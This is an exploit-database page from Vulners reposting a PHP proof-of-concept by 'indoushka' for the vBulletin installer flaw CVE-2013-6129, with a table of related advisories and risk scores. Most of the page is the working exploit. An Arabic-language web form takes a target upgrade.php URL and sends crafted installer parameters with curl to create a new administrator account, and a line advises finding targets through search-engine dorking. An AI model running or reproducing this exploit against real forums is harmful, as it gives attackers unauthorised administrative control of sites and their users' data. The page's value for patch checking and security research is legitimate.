Vulners
Lucene search
vBulletin 4.5 Add Administrator
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2013-6129 | 13 Oct 201300:00 | – | circl |
 | vBulletin install upgrade.php Privilege Escalation (CVE-2013-6129) | 9 Jun 201400:00 | – | checkpoint_advisories |
 | CVE-2013-6129 | 19 Oct 201310:00 | – | cve |
 | CVE-2013-6129 | 19 Oct 201310:00 | – | cvelist |
 | vBulletin 4.1.x RCE | 1 Dec 201300:00 | – | dsquare |
| vBulletin 5.x Remote Administrator Injection | 1 Dec 201300:00 | – | dsquare |
 | vBulletin Administrator Account Creation | 9 Oct 201318:12 | – | metasploit |
 | CVE-2013-6129 | 19 Oct 201310:36 | – | nvd |
 | vBulletin 4.1.x, 5.x Authentication Bypass Vulnerability - Active Check | 15 Nov 201300:00 | – | openvas |
 | VBulletin Administrator Account Creation | 31 Aug 202400:00 | – | packetstorm |
10
=============================================================================================================================================
| # Title : vBulletin 4.5 create new administrator account Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.vbulletin.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: Vulnerability in vBulletin to create new administrator account.
(Related : https://packetstorm.news/files/id/180859/ Linked CVE numbers: CVE-2013-6129 ) .
[+] save code as poc.php.
[+] USage : http://127.0.0.1/poc.php
[+] PayLoad :
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$username = $_POST["username"];
$password = $_POST["password"];
$email = $_POST["email"];
$target_uri = $_POST["target_uri"];
if ($username === $password) {
$message = " يجب أن تكون كلمة المرور مختلفة عن اسم المستخدم!";
} else {
// بيانات الطلب
$post_data = http_build_query([
'version' => 'install',
'response' => 'true',
'checktable' => 'false',
'firstrun' => 'false',
'step' => '7',
'startat' => '0',
'only' => 'false',
'options[skiptemplatemerge]' => '0',
'reponse' => 'yes',
'htmlsubmit' => '1',
'htmldata[username]' => $username,
'htmldata[password]' => $password,
'htmldata[confirmpassword]' => $password,
'htmldata[email]' => $email
]);
// تنفيذ الطلب
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_uri);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// فحص النجاح
if ($http_code == 200 && strpos($response, "Administrator account created") !== false) {
$message = " تم إنشاء الحساب بنجاح!<br>اسم المستخدم: <b>$username</b><br>كلمة المرور: <b>$password</b>";
$alert_class = "alert-success";
} else {
$message = " فشل في إنشاء الحساب!";
$alert_class = "alert-danger";
}
}
}
?>
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>إنشاء حساب مسؤول vBulletin</title>
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet">
</head>
<body class="bg-light">
<div class="container mt-5">
<div class="card shadow-lg">
<div class="card-header bg-primary text-white text-center">
<h3>إنشاء حساب مسؤول vBulletin</h3>
</div>
<div class="card-body">
<?php if (!empty($message)) : ?>
<div class="alert <?= $alert_class ?? 'alert-warning' ?>"><?= $message ?></div>
<?php endif; ?>
<form method="POST">
<div class="mb-3">
<label class="form-label">رابط vBulletin المستهدف:</label>
<input type="text" name="target_uri" class="form-control" required placeholder="مثال: http://target.com/install/upgrade.php">
</div>
<div class="mb-3">
<label class="form-label">اسم المستخدم:</label>
<input type="text" name="username" class="form-control" required>
</div>
<div class="mb-3">
<label class="form-label">كلمة المرور:</label>
<input type="password" name="password" class="form-control" required>
</div>
<div class="mb-3">
<label class="form-label">البريد الإلكتروني:</label>
<input type="email" name="email" class="form-control" required>
</div>
<button type="submit" class="btn btn-success w-100">إنشاء الحساب</button>
</form>
</div>
</div>
</div>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Mar 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
EPSS0.7819